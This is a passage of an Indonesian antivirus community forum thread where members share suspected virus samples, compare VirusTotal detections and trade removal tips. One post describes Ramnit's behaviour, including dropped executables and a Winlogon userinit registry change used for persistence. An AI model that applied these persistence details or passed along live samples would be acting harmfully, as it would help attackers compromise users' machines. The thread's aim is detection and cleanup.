Kalau aku lihat sih di listing program HTM nya ada kode VBS yang terenkripsi, serta mencoba autoload dengan script VBS tersebut. Tolong di chek yah rekan-rekan analyst .. he he he nanti aku kasih hadiah tahun baru deh .. (http://static.kaskus.us/images/smilies/toastcendol.gif)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 27, 2011, 11:19:56 PM
Baru aja aku dapat nih Trojan yang di Block sama AVAST, terdeteksi sebagai Trojan VBS AGENT ( Ini yang ke 19 selama aku Browse dari tanggal 20 Desember 2011, Hati-hati menjelang tahun baru 2012 ini banyak TROJAN berkeliaran ). Sama SMADAV 8.8 nggak dianggap virus alias belum terdeteksi.

Kalau aku lihat sih di listing program HTM nya ada kode VBS yang terenkripsi, serta mencoba autoload dengan script VBS tersebut. Tolong di chek yah rekan-rekan analyst .. he he he nanti aku kasih hadiah tahun baru deh .. (http://static.kaskus.us/images/smilies/toastcendol.gif)
Ini file html yang terinfeksi oleh Ramnit gann.. :)
Terdapat tambahan script pada bagian footer file HTML yang terinfeksi.

Pada saat menjalankan file HTML yang terinfeksi ini, dia akan membuat dan menjalankan file svchost.exe pada lokasi: C:\Documents and Settings\%User%\Local Settings\Temp.
Kemudian akan dibuat Watermark.exe pada lokasi: C:\Program Files\Microsoft.
Selanjutnya, merubah Registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
dari C:\WINDOWS\system32\userinit.exe menjadi c:\windows\system32\userinit.exe,,c:\program files\microsoft\watermark.exe.

Selanjutnya akan membuat shortcut di FD yang akan menjalankan induknya di dalam folder Recycler, menginfeksi file exe (serta membuat file duplikat virus: (nama file asli)+mgr.exe), dll, html yang lain dan mendownload malware2 lainnya.. :)

Ane gak tau ini Ramnit varian yang mana, tapi sewaktu ane coba upload (file tularannya ke FD) ke virustotal.com hasilnya berbeda-beda:
Sorry but you are not allowed to view spoiler contents.
Smadav sendiri mendeteksinya sebagai Ramnit A.
Ternyata Eset belum mendeteksi ini.. Mungkin bisa diupload oleh agan2 yang memakai eset untuk dimasukkan ke database mereka (ane upload di bawah).  :)
Mungkin rekan2 yang lain bisa menambahkan.. :)

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Desember 28, 2011, 08:24:29 AM
@ Ki@mhu
----------
Terima Kasih Gan ... (http://i1086.photobucket.com/albums/j460/achilsp/kiss.gif)

Weleh-weleh.., rupanya ramnit lagi yach.. :o . Seep Gan  :-bd, emang Ente pantes dapet gelar BEST ANALYST di FORSMAD nih :) . Kalo di PC aku nggak kedetek sama SMADAV Gan.., apa karena sudah di Block sama AVAST kali yah jadi file tersebut tidak terdeteksi lagi sama SMADAV  ???

Ramnit seneng banget nyerang PC aku yach  :D. (http://static.kaskus.us/images/smilies/toastcendol.gif)

OK Gan nanti Aku kasih hadiah tahun baru untuk Agan, tunggu saja yah nanti paling lambat tanggal 20 Januari 2012 ( tergantung pak Pos nya ) he he he.. :D , Apa itu.. :) pokoknya surprise deh ....  <=) tapi kasih alamat pengiriman paketnya ke aku lewat PM yah  :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 28, 2011, 08:48:23 AM
@Ki@mhu

Sampel yang Anda upload WOJwGevh.exe -> korup
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Desember 28, 2011, 10:37:56 AM
@Ki@mhu

Sampel yang Anda upload WOJwGevh.exe -> korup
bisa kok gan ane dunlut
terdeteksi smadav sebagai ramnit A tapi esset malah belum deteksi..... :-\ :-\
udah ane submit ke essetnya.
hebat smadav bisa mendeteksi virus yang belum terdeteksi esset :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 28, 2011, 11:01:57 AM
@Surya: Makasih gann.. Tapi gelar itu belum pantas buat ane gann.. Toh ane juga belajar dari rekan2 di sini.. Pastilah masih banyak yang lebih baik di sini..  :)
Iyaa gan.. Mungkin file WOJwGevh.exe dibekukan ma avast, jadi Smadav tidak mendeteksinya.. Tapi kalo file html terinfeksi yang agan upload kemarin memang belum terdeteksi Smadav.
Beneran gan pake kiriman? Wahh.. Jujur ane senang dengan ini.. <=)
Tapi apa gak membuat agan repot nantinya? Kan ane cuma bantu dikit aja..  :)

@Milomen: Ane upload ulang yahh.. Sekalian sama autorun.inf di FD dan folder Recyclernya.. Ane juga tambahin 3 file induk yang dibuat di HD: watermark.exe, svchost.exe, dan explorermgr.exe yang belum terdeteksi oleh sebagian AV termasuk ESET.

@Manggolo: Iyaa.. Hebat yah teknik pendeteksian Smadav..  :)

Hasil virustotal.com untuk watermark.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=77c7b9e1e9d2bc6a0fe8c6b3df2f29eefd5d40e2d3b5df78603413991d0b0a8d-1325043592)

Hasil virustotal.com untuk svchost.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=05f053e29ca95d4be85d75e8b945fe39f626f11ce808a3a98430f54b0dece959-1325043823)

Hasil virustotal.com untuk explorermgr.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=0e7ad87dc900b13d80100ab3dcce809258b28ca2a1b920b8563b71e1db20ec60-1325043890)

Kebanyakan mengatakan ini Ramnit A.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 28, 2011, 11:12:28 AM
@Surya: Makasih gann.. Tapi gelar itu belum pantas buat ane gann.. Toh ane juga belajar dari rekan2 di sini.. Pastilah masih banyak yang lebih baik di sini..  :)
Iyaa gan.. Mungkin file WOJwGevh.exe dibekukan ma avast, jadi Smadav tidak mendeteksinya.. Tapi kalo file html terinfeksi yang agan upload kemarin memang belum terdeteksi Smadav.
Beneran gan pake kiriman? Wahh.. Jujur ane senang dengan ini.. <=)
Tapi apa gak membuat agan repot nantinya? Kan ane cuma bantu dikit aja..  :)

@Milomen: Ane upload ulang yahh.. Sekalian sama autorun.inf di FD dan folder Recyclernya.. Ane juga tambahin 3 file induk yang dibuat di HD: watermark.exe, svchost.exe, dan explorermgr.exe yang belum terdeteksi oleh sebagian AV termasuk ESET.

@Manggolo: Iyaa.. Hebat yah teknik pendeteksian Smadav..  :)

Hasil virustotal.com untuk watermark.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=77c7b9e1e9d2bc6a0fe8c6b3df2f29eefd5d40e2d3b5df78603413991d0b0a8d-1325043592)

Hasil virustotal.com untuk svchost.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=05f053e29ca95d4be85d75e8b945fe39f626f11ce808a3a98430f54b0dece959-1325043823)

Hasil virustotal.com untuk explorermgr.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=0e7ad87dc900b13d80100ab3dcce809258b28ca2a1b920b8563b71e1db20ec60-1325043890)

Kebanyakan mengatakan ini Ramnit A.
mantap gan sampelnya  :-bd , gw ikutan downlod ya gan smadav memang yahud kali gan  <=) +1 buat agan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 28, 2011, 11:29:03 AM
@Ponco: Sama2 gann.. Terima kasih ijo-ijonya..  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Desember 28, 2011, 11:41:41 AM
@ Ki@mhu

He he he  :D . Bener kok gan aku serius mau kirimin paket buat Agan sebagai ucapan terima kasih karena selama 3 bulan ini aku perhatiin semua POSTER SMADAV yang nggak bikin aku bete cuma Agan aja  :-bd.

Keep Good Posting !!! ,  :)

Jangan lupa kasih alamat pengiriman paket nya yach lewat PM biar SECURE plus KODE POS nya Yach  :) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 28, 2011, 12:07:08 PM
@ Ki@mhu

He he he  :D . Bener kok gan aku serius mau kirimin paket buat Agan sebagai ucapan terima kasih karena selama 3 bulan ini aku perhatiin semua POSTER SMADAV yang nggak bikin aku bete cuma Agan aja  :-bd.

Keep Good Posting !!! ,  :)

Jangan lupa kasih alamat pengiriman paket nya yach lewat PM biar SECURE plus KODE POS nya Yach  :) :)
Makasih banget yahh gann.. Uda ane PM.. Coba cekk..  :)
Indahnya berbagi..  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 28, 2011, 12:09:45 PM
@ Ki@mhu

He he he  :D . Bener kok gan aku serius mau kirimin paket buat Agan sebagai ucapan terima kasih karena selama 3 bulan ini aku perhatiin semua POSTER SMADAV yang nggak bikin aku bete cuma Agan aja  :-bd.

Keep Good Posting !!! ,  :)

Jangan lupa kasih alamat pengiriman paket nya yach lewat PM biar SECURE plus KODE POS nya Yach  :) :)
agan baek bgt ya gan,,, salut buat agan  :-bd <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jurassic Park pada Desember 28, 2011, 10:05:56 PM
Untuk para master di sini, aku mau tanya nih.
File di bawah itu udah keinject virus gak ya ? ( soalnya udah mondar-mandir ke banyak komputer sih )
Menurut AVG itu Kuda Troya PSW.GEeneric8.BLDN, tapi AVku yang lain seperti MSE dan Malwarebytes Anti Malware tidak detect. Mohon pencerahan ya, soalnya aplikasi itu penting banget buat browse koleksi fontku yang udah ratusan. Yang bisa beri pencerahan kuberi +1 deh.  ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 28, 2011, 10:25:10 PM
Untuk para master di sini, aku mau tanya nih.
File di bawah itu udah keinject virus gak ya ? ( soalnya udah mondar-mandir ke banyak komputer sih )
Menurut AVG itu Kuda Troya PSW.GEeneric8.BLDN, tapi AVku yang lain seperti MSE dan Malwarebytes Anti Malware tidak detect. Mohon pencerahan ya, soalnya aplikasi itu penting banget buat browse koleksi fontku yang udah ratusan. Yang bisa beri pencerahan kuberi +1 deh.  ^:)^ ^:)^ ^:)^
Ane coba jawab yahh.. Tapi bukan berarti ane ngaku mastahh yahh..  ;)

Bukan virus gann... Karena tidak ada perubahan file yang dilakukannya terhadap sistem kita dan Registry yang diubahnya juga tidak berbahaya.. Hanya berupa penambahan key value yang menyertainya:
HKEY_CURRENT_USER\Software\VanDerLee
HKEY_USERS\S-1-5-21-1202660629-1580818891-854245398-1003\Software\VanDerLee

Juga tidak ada aktivitas internet yang dilakukannya.. Jadi, 100% aman..  :)
Walaupun hasil dari virustotal.com (http://www.virustotal.com/file-scan/report.html?id=a5f54ad00f64802f8fa7e4c2ed9018ebfb7f5bef7f7cb765c8aaf8d03c711dbb-1325085500), ada 9 AV yang salah mendeteksi..  :)
Btw, software yang bagus gann.. Ijin save yahh..  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 29, 2011, 04:36:08 AM
@Surya: Makasih gann.. Tapi gelar itu belum pantas buat ane gann.. Toh ane juga belajar dari rekan2 di sini.. Pastilah masih banyak yang lebih baik di sini..  :)
Iyaa gan.. Mungkin file WOJwGevh.exe dibekukan ma avast, jadi Smadav tidak mendeteksinya.. Tapi kalo file html terinfeksi yang agan upload kemarin memang belum terdeteksi Smadav.
Beneran gan pake kiriman? Wahh.. Jujur ane senang dengan ini.. <=)
Tapi apa gak membuat agan repot nantinya? Kan ane cuma bantu dikit aja..  :)

@Milomen: Ane upload ulang yahh.. Sekalian sama autorun.inf di FD dan folder Recyclernya.. Ane juga tambahin 3 file induk yang dibuat di HD: watermark.exe, svchost.exe, dan explorermgr.exe yang belum terdeteksi oleh sebagian AV termasuk ESET.

@Manggolo: Iyaa.. Hebat yah teknik pendeteksian Smadav..  :)

Hasil virustotal.com untuk watermark.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=77c7b9e1e9d2bc6a0fe8c6b3df2f29eefd5d40e2d3b5df78603413991d0b0a8d-1325043592)

Hasil virustotal.com untuk svchost.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=05f053e29ca95d4be85d75e8b945fe39f626f11ce808a3a98430f54b0dece959-1325043823)

Hasil virustotal.com untuk explorermgr.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=0e7ad87dc900b13d80100ab3dcce809258b28ca2a1b920b8563b71e1db20ec60-1325043890)

Kebanyakan mengatakan ini Ramnit A.
File yang dikirimkan corrupt, sehingga tidak ada deteksi untuk file tersebut. :(
Sorry but you are not allowed to view spoiler contents.
Sorry but you are not allowed to view spoiler contents.

Untuk para master di sini, aku mau tanya nih.
File di bawah itu udah keinject virus gak ya ? ( soalnya udah mondar-mandir ke banyak komputer sih )
Menurut AVG itu Kuda Troya PSW.GEeneric8.BLDN, tapi AVku yang lain seperti MSE dan Malwarebytes Anti Malware tidak detect. Mohon pencerahan ya, soalnya aplikasi itu penting banget buat browse koleksi fontku yang udah ratusan. Yang bisa beri pencerahan kuberi +1 deh.  ^:)^ ^:)^ ^:)^
Berkas 'Font Browser.exe' bukan virus. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jurassic Park pada Desember 29, 2011, 06:36:06 PM
@Surya: Makasih gann.. Tapi gelar itu belum pantas buat ane gann.. Toh ane juga belajar dari rekan2 di sini.. Pastilah masih banyak yang lebih baik di sini..  :)
Iyaa gan.. Mungkin file WOJwGevh.exe dibekukan ma avast, jadi Smadav tidak mendeteksinya.. Tapi kalo file html terinfeksi yang agan upload kemarin memang belum terdeteksi Smadav.
Beneran gan pake kiriman? Wahh.. Jujur ane senang dengan ini.. <=)
Tapi apa gak membuat agan repot nantinya? Kan ane cuma bantu dikit aja..  :)

@Milomen: Ane upload ulang yahh.. Sekalian sama autorun.inf di FD dan folder Recyclernya.. Ane juga tambahin 3 file induk yang dibuat di HD: watermark.exe, svchost.exe, dan explorermgr.exe yang belum terdeteksi oleh sebagian AV termasuk ESET.

@Manggolo: Iyaa.. Hebat yah teknik pendeteksian Smadav..  :)

Hasil virustotal.com untuk watermark.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=77c7b9e1e9d2bc6a0fe8c6b3df2f29eefd5d40e2d3b5df78603413991d0b0a8d-1325043592)

Hasil virustotal.com untuk svchost.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=05f053e29ca95d4be85d75e8b945fe39f626f11ce808a3a98430f54b0dece959-1325043823)

Hasil virustotal.com untuk explorermgr.exe --> Klik (http://www.virustotal.com/file-scan/report.html?id=0e7ad87dc900b13d80100ab3dcce809258b28ca2a1b920b8563b71e1db20ec60-1325043890)

Kebanyakan mengatakan ini Ramnit A.
File yang dikirimkan corrupt, sehingga tidak ada deteksi untuk file tersebut. :(
Sorry but you are not allowed to view spoiler contents.
Sorry but you are not allowed to view spoiler contents.

Untuk para master di sini, aku mau tanya nih.
File di bawah itu udah keinject virus gak ya ? ( soalnya udah mondar-mandir ke banyak komputer sih )
Menurut AVG itu Kuda Troya PSW.GEeneric8.BLDN, tapi AVku yang lain seperti MSE dan Malwarebytes Anti Malware tidak detect. Mohon pencerahan ya, soalnya aplikasi itu penting banget buat browse koleksi fontku yang udah ratusan. Yang bisa beri pencerahan kuberi +1 deh.  ^:)^ ^:)^ ^:)^
Berkas 'Font Browser.exe' bukan virus. :)
Thanks Bro, lega rasanya cuma false postive, +1 sudah datang :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 29, 2011, 06:45:41 PM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 29, 2011, 07:58:05 PM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Hanya file watermark.exe aja, karna ukuran filenya sama. semua av mengatakan korup sob. :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Desember 29, 2011, 09:08:34 PM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Hanya file watermark.exe aja, karna ukuran filenya sama. semua av mengatakan korup sob. :(
kalau boleh tau @milo ini submit url atau submit files ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 30, 2011, 10:17:21 AM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Hanya file watermark.exe aja, karna ukuran filenya sama. semua av mengatakan korup sob. :(
kalau boleh tau @milo ini submit url atau submit files ?
Submit files. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 30, 2011, 12:59:26 PM
Update virus lageee gan = Fake AV  <=)
belon banyak yg detek, avast gw aja adem ayem  ;D

VT:
http://www.virustotal.com/file-scan/report.html?id=423d96128dd324ece961af017db9894688ba019a4018da827e124dd13c52114f-1325223998

Result:
13/ 43 (30.2%)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 30, 2011, 09:55:30 PM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Hanya file watermark.exe aja, karna ukuran filenya sama. semua av mengatakan korup sob. :(
kalau boleh tau @milo ini submit url atau submit files ?
Submit files. :)
koq bisa corrupt yah? Padahal sampel yang sama juga banyak dideteksi oleh AV yang lain berdasarkan hasil dari virustotal.com.  :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 31, 2011, 06:46:29 AM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Hanya file watermark.exe aja, karna ukuran filenya sama. semua av mengatakan korup sob. :(
kalau boleh tau @milo ini submit url atau submit files ?
Submit files. :)
koq bisa corrupt yah? Padahal sampel yang sama juga banyak dideteksi oleh AV yang lain berdasarkan hasil dari virustotal.com.  :-\
Ya bisa aja lah bro, sebelumnya sampel virus pernah bro clean pakek antivirus ngk ??? kadang2 kalo cek di virustotal.com kurang valid.

Ayo buat temen2 yang lain ada ngk sampel virus yang belum terdeteksi antivirus ??? kirimkan sampelnya kesini and jgn lupa di winzip / winrar (tanpa password).
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 31, 2011, 09:14:43 AM
Kutip
Ya bisa aja lah bro, sebelumnya sampel virus pernah bro clean pakek antivirus ngk  kadang2 kalo cek di virustotal.com kurang valid.
Belum pernah diclean dengan Anti Virus c.. Ane jalankan virusnya di Virtual Box tanpa ada Anti Virus dan ane langsung pindahkan Induknya dan dikompress.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 31, 2011, 11:08:11 AM
@Milomen: Koq bisa yahh gann? Padahal ane barusan coba tes download ulang file yang uda ane upload kemarin tapi masih bisa..
Kalo boleh tahu, yang agan upload kemarin itu cuma file watermark.exe atau seluruhnya? :)
Hanya file watermark.exe aja, karna ukuran filenya sama. semua av mengatakan korup sob. :(
kalau boleh tau @milo ini submit url atau submit files ?
Submit files. :)
koq bisa corrupt yah? Padahal sampel yang sama juga banyak dideteksi oleh AV yang lain berdasarkan hasil dari virustotal.com.  :-\
Ya bisa aja lah bro, sebelumnya sampel virus pernah bro clean pakek antivirus ngk ??? kadang2 kalo cek di virustotal.com kurang valid.

Ayo buat temen2 yang lain ada ngk sampel virus yang belum terdeteksi antivirus ??? kirimkan sampelnya kesini and jgn lupa di winzip / winrar (tanpa password).
gan, klo bisa virus2 yg diupload di forum di review dong gan,terutama virus2 yg menarik untuk dibahas gan,biar kita2 disini jadi tau gan. gw yakin nanti bakal bnyak yg uplaod virus gan, termasuk pastinya gw sendiri gan  :-bd <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 31, 2011, 12:25:47 PM
Kutip
gan, klo bisa virus2 yg diupload di forum di review dong gan,terutama virus2 yg menarik untuk dibahas gan,biar kita2 disini jadi tau gan. gw yakin nanti bakal bnyak yg uplaod virus gan, termasuk pastinya gw sendiri gan   
Di-review di sini (http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/) kan gann?

Apakah rekan-rekan Smadaver di sini boleh ngasi Review di Tread itu selain momod? ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Desember 31, 2011, 02:58:14 PM
Apakah rekan-rekan Smadaver di sini boleh ngasi Review di Tread itu selain momod? ???
boleh sekali gan.
review itu sendiri kan nantinya juga sangat berguna bagi smadaver disini.menambah pengetahuan.  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 31, 2011, 05:43:43 PM
Kutip
gan, klo bisa virus2 yg diupload di forum di review dong gan,terutama virus2 yg menarik untuk dibahas gan,biar kita2 disini jadi tau gan. gw yakin nanti bakal bnyak yg uplaod virus gan, termasuk pastinya gw sendiri gan   
Di-review di sini (http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/) kan gann?

Apakah rekan-rekan Smadaver di sini boleh ngasi Review di Tread itu selain momod? ???
klo gw rasa sih momod lagi sibuk gan, mungkin sesama anggota forum bisa ngasih sumbangsih review virus disini gan, nanti gw juga ikut review deh gan  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Desperados pada Januari 03, 2012, 08:37:46 AM
q kok susah yah download sample viri nx..???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 03, 2012, 07:13:56 PM
Forum Smadaver.com ni rame tyus tiap hari,,   :-bd :-bd :-bd
aq dapet ilmu pervirusan banyak dari sini

Matursuwun agan2 semua  :-X  :-X  :-X
 :D :D :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 03, 2012, 07:55:48 PM
Forum Smadaver.com ni rame tyus tiap hari,,   :-bd :-bd :-bd
aq dapet ilmu pervirusan banyak dari sini

Matursuwun agan2 semua  :-X  :-X  :-X
 :D :D :D :D
Iyahh gann.. Ane juga banyak belajar dari rekan-rekan di sini.. :-bd
Kalo ada sampel virus baru, diupload yahh gann.. Biar pengetahuan kita semua di sini tentang virus baru tidak ketinggalan.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M.Imron pada Januari 03, 2012, 09:24:52 PM
hallo ....smadaver, baru gabung nih, gimana cara basmi virus jenis apa aja menggunakan smadav,bantuin dong.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Januari 04, 2012, 01:46:04 PM
gan, barusan dapet file installer gw curiga,pas gw check ternyata ini trojan downloader gan,,, efeknya mendownload file dr internet,memodifikasi registry, membuat proses di system,mengarahkan ke suatu link saat browsing.cekidot ya gan  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Januari 04, 2012, 07:58:08 PM
gan, barusan dapet file installer gw curiga,pas gw check ternyata ini trojan downloader gan,,, efeknya mendownload file dr internet,memodifikasi registry, membuat proses di system,mengarahkan ke suatu link saat browsing.cekidot ya gan  <=)
Ok terima kasih sempelnya, ESET NOD32 mendeteksi sebagai virus Win32/Adware.FakeBye. Rata2 antivirus impor sudah banyak yang mendeteksi keberadaan virus ini. Untuk antivirus smadav akan di masukan ke database selanjutnya. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 04, 2012, 08:06:04 PM
virusnya merubah ukuran file exe tapi tetap dengan ikon file tsb dan size berbeda2
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 04, 2012, 08:09:02 PM
tambahan file lain yg sdh ke infeksi/berubah jadi virus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Januari 04, 2012, 08:12:59 PM
Hai rekan-rekan smadaver.... :D
Aku baru pulang dari RINJANI nih, wuiiihh capek dech tapi asiiik juga lihat ciptaan ALLAH yang luar biasa disana  :-bd.
BTW di atas gunung rinjani sana nggak ada Internet jadi aku nggak bisa OL  :'(

Pas sampe di Rumah aku langsung buka LEPY sama KOMPI aku, tapi.. :(  :'( . PC aku jadi berantakan ( mungkin dipakai ponakan aku kali ), setelah aku cek aku dapati semua folder di salah satu drive aku semuanya jadi karakter-karakter aneh ( lihat screen shoot yang ada di attachment ) gejala-gejala nya begini :

# Bandwith internet terpakai lebih kurang 50% nya, sepertinya virus ini melakukan koneksi ke situs-situs yang aku nggak tahu kemana tujuannya.

# Koneksi ke situs AV ( AVAST, AVIRA, AVG, KASPERSKY ) di block sedangkan untuk yang lainnya seperti akses SMADAVER.COM jadi lamaaaa banget.

# Instalasi AV dipending (AVAST, AVIRA, AVG) ESS 5 dan KASPERSKY mau di install tapi bujug buneng lamaaaa banget.

# Salah satu drive (mungkin random) dibuat menjadi acak-acakan seperti yang ada di screen shoot.

Rekan-rekan analys tolong di chek yah virus apa ini plus sekalian clue nya klo bisa  :D . Aku dah coba pake ESS 5 dan KASPERSKY  tapi kayaknya kewalahan sebab hampir semua file terinfek oleh puluhan virus ( Ramnit, Slugin, Virut  :o ).
Cara manual dengan menggunakan removal RAMNIT KILLER dan AVG RMSLUGIN sudah aku lakukan, tapi file yang aku upload ini tidak dianggap virus oleh removal tersebut, jadi masih aktif sampai sekarang.

@ Ki@amhu :
=========
He he he ... :) , Paketnya sudah aku kirim melalui PT. POS INDONESIA tunggu saja yah mudah-mudahan bisa cepat sebab aku kirin paket ke 27 orang yang aku anggap pantas menerimanya  :) . Tapi jangan dilihat dari nilai barangnya yah  ^:)^ itu sebagai kenang-kenangan dari aku saja sebagai teman di SMADAVER  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Januari 04, 2012, 08:16:36 PM
fuihh... :o , gara-gara tuh virus sumpah deh..  ^:)^ aku mau POST plus upload ke Forsmad aja setengah mati deh  :o baru berhasil setelah menunggu +/- 2 jam  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Januari 04, 2012, 08:41:25 PM
Terima kasih.

Hmm.... Sepertinya thread ini akan digabung saja ya!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 04, 2012, 09:17:06 PM
@Surya: Makasih banyak yahh gann.. Oke.. Ada niat aja ane sudah senang bgt.. :) Akan ane simpen baik-baik.. :-bd
Btw.. Happy New Year yahh gann.. :)

Mungkin setelah sampel dari agan tadi didownload rekan2 di sini, ada titik terang oleh mereka.. Sabar yahh gan.. Pasti ada jalannya.. :)

#Update#
Barusan ane uda download sampelnya, 4 dari 5 sampel itu merupakan virut..
Coba scan dengan Dr.Web Cure It atau Norman Walware Cleaner gann.. Scan lewat safe mode aja.. Download aja dari komp yang sehat.. Dan ganti namanya dari *.exe menjadi *.cmd sebelum scan biar tidak ikut terinfeksi. :)
Yang harus agan lakukan sebelum scan:
1. Matikan System Restore dan aktifkan Smad-lock sebelum mulai scan..
2. Kill proses yang mencurigakan dengan proses manager Smadav, jika proses yang di-kill masih muncul, disuspend aja..
Semoga berhasil..
Laporkan kembali perkembangannya yahh gann.. :)

Kutip
tambahan file lain yg sdh ke infeksi/berubah jadi virus
Komp agan yang terinfeksi virus ini yahh?
Atau sampel ini agan dapat dari komp lain? :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 04, 2012, 09:22:30 PM
komputer ane sdh di deep freeze gan, file ini letaknya di master program di drive lain, yg c sdh dikunci ama deep freeze,
ketahuannya pas ane install komputer baru, pas di klik gak ada respon, trus ane liat di task manager CPU usagenya 50% dan di FD ada folder recycle bin dan di baca sebagai virus oleh smartp
mohon pencerahannya gan ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 04, 2012, 10:21:49 PM
komputer ane sdh di deep freeze gan, file ini letaknya di master program di drive lain, yg c sdh dikunci ama deep freeze,
ketahuannya pas ane install komputer baru, pas di klik gak ada respon, trus ane liat di task manager CPU usagenya 50% dan di FD ada folder recycle bin dan di baca sebagai virus oleh smartp
mohon pencerahannya gan ^:)^
Maaf baru balas gann.. Tadi ane makan dan mandi.. Ni baru balek.. Ane coba jalankan sampelnya dulu yahh..
Nanti ane balas lagi yahh setelah dapat hasilnya.. Atau rekan-rekan yang lain juga bisa turut membantu..

Selagi menunggu, mungkin agan bisa lampirkan log hasil scan agan di sini biar lebih jelas..  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 04, 2012, 11:14:18 PM
Maaf baru balas gann.. Tadi ane makan dan mandi.. Ni baru balek.. Ane coba jalankan sampelnya dulu yahh..
Nanti ane balas lagi yahh setelah dapat hasilnya.. Atau rekan-rekan yang lain juga bisa turut membantu..

Selagi menunggu, mungkin agan bisa lampirkan log hasil scan agan di sini biar lebih jelas..  :)

trims gan  :) ini filenya gan, tadi ane sdh coba pake A*G free, sekarang kompternya sdh lumayan oke, tapi menurut smartp masih ada registry yang yang belum bisa di perpaiki  :-\
